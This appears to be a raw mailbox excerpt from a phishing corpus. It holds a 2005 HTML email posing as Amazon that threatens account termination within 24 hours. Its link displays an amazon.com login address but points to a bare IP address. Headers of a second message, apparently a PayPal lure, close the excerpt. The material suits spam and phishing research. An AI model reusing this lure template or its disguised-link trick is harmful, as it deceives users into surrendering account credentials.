From: update@amazon.com <update@amazon.com>
Content-Type: text/html
Message-Id: <20051126003224.CF5AE7C48EF@MF-Server.local>
Date: Fri, 25 Nov 2005 16:32:24 -0800 (PST)
X-Spam-Checker-Version: SpamAssassin 3.0.2 (2004-11-16)
X-Spam-Level: ***
X-Spam-Status: No, score=3.2 required=5.0 tests=HTML_MESSAGE,
	HTML_TAG_EXIST_TBODY,MIME_HEADER_CTYPE_ONLY,MIME_HTML_ONLY,
	NORMAL_HTTP_TO_IP,RAZOR2_CF_RANGE_51_100,RAZOR2_CHECK,
	RCVD_IN_BL_SPAMCOP_NET autolearn=no version=3.0.2
X-Spam-Report: 
	*  0.0 NORMAL_HTTP_TO_IP URI: Uses a dotted-decimal IP address in URL
	*  0.0 HTML_MESSAGE BODY: HTML included in message
	*  0.1 HTML_TAG_EXIST_TBODY BODY: HTML has "tbody" tag
	*  0.1 RAZOR2_CF_RANGE_51_100 BODY: Razor2 gives confidence level above 50%
	*      [cf: 100]
	*  0.2 MIME_HTML_ONLY BODY: Message only has text/html MIME parts
	*  1.5 RAZOR2_CHECK Listed in Razor2 (http://razor.sf.net/)
	*  1.2 RCVD_IN_BL_SPAMCOP_NET RBL: Received via a relay in bl.spamcop.net
	*      [Blocked - see <http://www.spamcop.net/bl.shtml?208.57.237.97>]
	*  0.1 MIME_HEADER_CTYPE_ONLY 'Content-Type' found without required MIME headers
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 37


<HTML>
<meta name="generator" content="Namo WebEditor v5.0(Trial)">
&nbsp;  <IMG height=30 
src="http://g-images.amazon.com/images/G/04/icons/amazon-logo.gif" width=140> <TABLE cellSpacing=0 cellPadding=0 width=600
align=center border=0> <TBODY> <TR> <TD><IMG height=2
src="pp.files/pixel.gif"  width=2></TD></TR></TBODY></TABLE> <P><FONT
size=2><FONT face=Verdana>Dear&nbsp;<STRONG><STRONG><SPAN
style="FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY: 
Verdana">Amazon<SUP>® &nbsp;</SUP></SPAN></STRONG>&nbsp;</STRONG>member</FONT>,&nbsp;<BR></font><BR></P>
<P><FONT face=Verdana size=2>It has come to our attention that
your&nbsp;<SPAN style="FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY:
Verdana"><STRONG>Amazon</STRONG></SPAN> order Information 
records are &nbsp;<BR>out of date.That requires you to update
the order Information If you could&nbsp;<BR>please take
5-10 minutes out of your online&nbsp;<FONT face=Verdana size=2>
experience and update&nbsp;<BR>your order records,  you will not run 
into any future problems with Amazon&nbsp;<BR>online service.

&nbsp;<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</FONT></FONT></P>
<P><FONT face=Verdana 
size=2><FONT face=Verdana size=2>However, failure to update your records will
result in account termination.&nbsp;<BR>Please update your records in 
maximum 24 hours.&nbsp;</FONT>&nbsp;<BR><BR>Once you have updated
records, your&nbsp;<SPAN style="FONT-SIZE: 10pt; COLOR: black; 
FONT-FAMILY: Verdana"><STRONG>Amazon</STRONG></SPAN> session
will not be&nbsp;<BR>interrupted and will continue as normal. </FONT></P>
<P><FONT face=Verdana size=2>To update your <SPAN style="FONT-SIZE: 10pt;
COLOR: black; FONT-FAMILY:
Verdana"><STRONG>Amazon</STRONG></SPAN> order Information 
click on the
following link:&nbsp;<BR></FONT></P>
<p><FONT face=Verdana size=2>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</FONT><SPAN class=treb><SPAN style="FONT-SIZE: 9pt; FONT-FAMILY: Verdana"><A 
onclick="return ShowLinkWarning()" 
href="http://203.130.234.141/usage/login.html" 
target=_blank>http://www.amazon.com/exec/obidos/account-access-login/ref=/index</A></SPAN></SPAN></p>
<P>&nbsp;<FONT face=Verdana size=2>Best Regards , <BR><SPAN style="FONT-SIZE:  10pt; 
COLOR: black; 
FONT-FAMILY: Verdana"><STRONG>Amazon<SUP> </SUP><SPAN style="FONT-SIZE: 
10pt; COLOR: black; FONT-FAMILY: Verdana">Security </SPAN></STRONG><SPAN
style="FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY:
Verdana"><STRONG>Departament</STRONG></SPAN></SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;

</FONT></P> <P><FONT face=Verdana size=2>&nbsp;</font>
<p><FONT face=Verdana size=2>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  <SPAN class="tiny"><A 
href="http://www.amazon.com/exec/obidos/tg/browse/-/508088/103-3650287-7644618"><font color="#006699" size="2">Conditions 
of Use</font></A><font color="#006699" size="2"> | </font><A 
href="http://www.amazon.com/exec/obidos/tg/browse/-/468496/103-3650287-7644618"><font color="#006699" size="2">Privacy 
Notice</font></A><font color="#006699" size="2"> </font><font size="2">© 1995-2005, Amazon.com, Inc. or its affiliates. </font></SPAN></p>
<TABLE cellSpacing=0 cellPadding=0 
width=600
align=center border=0> <TBODY> <TR> <TD><IMG height=2
src="pp.files/pixel.gif"  width=2></TD></TR></TBODY></TABLE> <P>
</HTML>

From nobody@lwf.ladot.com  Sat Nov 26 11:40:09 2005
Return-Path: <nobody@lwf.ladot.com>
X-Original-To: nobody@login.example.com
Delivered-To: nobody@login.example.com
Received: from mail1.example.com (mail1.example.com [10.1.2.3])
	by naughty.example.com (Postfix) with ESMTP id 006115370FE
	for <nobody@login.example.com>; Sat, 26 Nov 2005 11:40:09 -0500 (EST)
Received: from mail1.example.com (localhost.example.com [127.0.0.1])
	by mail1.example.com (Postfix) with ESMTP id CD9616CCE2A
	for <nobody@example.com>; Sat, 26 Nov 2005 11:40:07 -0500 (EST)
Received: from relay02.active24.nl (relay02.active24.nl [217.22.66.37])
	by mail1.example.com (Postfix) with ESMTP
	for <nobody@example.com>; Sat, 26 Nov 2005 11:40:07 -0500 (EST)
Received: from lwf.ladot.com (lwf.active24.nl [217.22.64.72])
	by relay02.active24.nl (Postfix) with ESMTP id 71C4E485D2
	for <nobody@example.com>; Sat, 26 Nov 2005 15:53:58 +0100 (CET)
Received: (from nobody@localhost)
	by lwf.ladot.com (8.11.6/8.11.6) id jAQGd4B22287;
	Sat, 26 Nov 2005 17:39:04 +0100
Date: Sat, 26 Nov 2005 17:39:04 +0100
Message-Id: <200511261639.jAQGd4B22287@lwf.ladot.com>
To: nobody@example.com
Subject: Your Paypal Account.
